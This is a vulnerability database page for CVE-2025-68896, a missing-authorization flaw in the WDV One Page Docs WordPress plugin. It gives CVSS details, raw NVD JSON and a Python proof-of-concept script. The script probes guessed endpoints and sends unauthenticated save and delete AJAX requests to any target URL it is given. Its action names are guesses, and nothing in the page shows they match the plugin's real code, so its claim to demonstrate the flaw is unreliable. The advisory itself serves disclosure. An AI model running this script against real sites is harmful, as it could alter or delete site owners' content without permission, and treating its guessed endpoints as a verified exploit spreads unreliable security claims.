Security Vulnerability Report
中文
CVE-2025-68896 CVSS 6.5 MEDIUM

CVE-2025-68896

Published: 2026-01-22 17:16:13
Last Modified: 2026-04-15 00:35:42

Description

Missing Authorization vulnerability in vrpr WDV One Page Docs wdv-one-page-docs allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WDV One Page Docs: from n/a through <= 1.2.4.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

WDV One Page Docs <= 1.2.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-68896 PoC - WDV One Page Docs Access Control Bypass # Target: WordPress site with WDV One Page Docs plugin <= 1.2.4 import requests import sys def check_vulnerability(target_url): """ Check if the target is vulnerable to CVE-2025-68896 Missing Authorization vulnerability in WDV One Page Docs """ # Common WordPress plugin paths that might be affected potential_endpoints = [ f"{target_url}/wp-admin/admin-ajax.php", f"{target_url}/wp-content/plugins/wdv-one-page-docs/", f"{target_url}/?action=wdv_one_page_docs_get_content", f"{target_url}/?rest_route=/wdv-one-page-docs/v1/" ] print(f"[*] Testing target: {target_url}") print(f"[*] CVE-2025-68896 - Missing Authorization in WDV One Page Docs") print("=" * 60) for endpoint in potential_endpoints: try: # Test unauthenticated access response = requests.get(endpoint, timeout=10) # Check for sensitive data exposure or unauthorized access indicators if response.status_code == 200: # Check response content for sensitive data if 'document' in response.text.lower() or 'content' in response.text.lower(): print(f"[+] POTENTIAL VULNERABILITY: {endpoint}") print(f" Status: {response.status_code}") print(f" Response length: {len(response.text)} bytes") return True except requests.RequestException as e: print(f"[-] Error testing {endpoint}: {e}") print("[*] No obvious vulnerability indicators found") print("[*] Manual testing recommended with authenticated requests") return False def exploit_demo(target_url): """ Demonstrate the access control bypass This PoC shows how an unauthenticated user can access protected content """ print("\n[*] Attempting to access protected documentation content...") # Try to access plugin functionality without authentication headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) PoC-Tester', 'Content-Type': 'application/x-www-form-urlencoded' } # Common AJAX actions that might be exploited ajax_actions = [ 'wdv_one_page_docs_get_content', 'wdv_one_page_docs_save', 'wdv_one_page_docs_delete' ] for action in ajax_actions: data = {'action': action} try: response = requests.post( f"{target_url}/wp-admin/admin-ajax.php", data=data, headers=headers, timeout=10 ) # If we get a successful response without authentication # it indicates the missing authorization vulnerability if response.status_code == 200 and 'nonce' not in response.text: print(f"[!] VULNERABLE: Action '{action}' accessible without authentication") print(f" Response: {response.text[:200]}...") except requests.RequestException: pass if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-68896-poc.py <target_url>") print("Example: python cve-2025-68896-poc.py http://example.com") sys.exit(1) target = sys.argv[1].rstrip('/') check_vulnerability(target) exploit_demo(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68896", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:13.240", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in vrpr WDV One Page Docs wdv-one-page-docs allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WDV One Page Docs: from n/a through <= 1.2.4."}, {"lang": "es", "value": "Vulnerabilidad de Falta de Autorización en vrpr WDV One Page Docs wdv-one-page-docs permite Explotar Niveles de Seguridad de Control de Acceso Mal Configurados. Este problema afecta a WDV One Page Docs: desde n/a hasta &lt;= 1.2.4."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wdv-one-page-docs/vulnerability/wordpress-wdv-one-page-docs-plugin-1-2-4-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}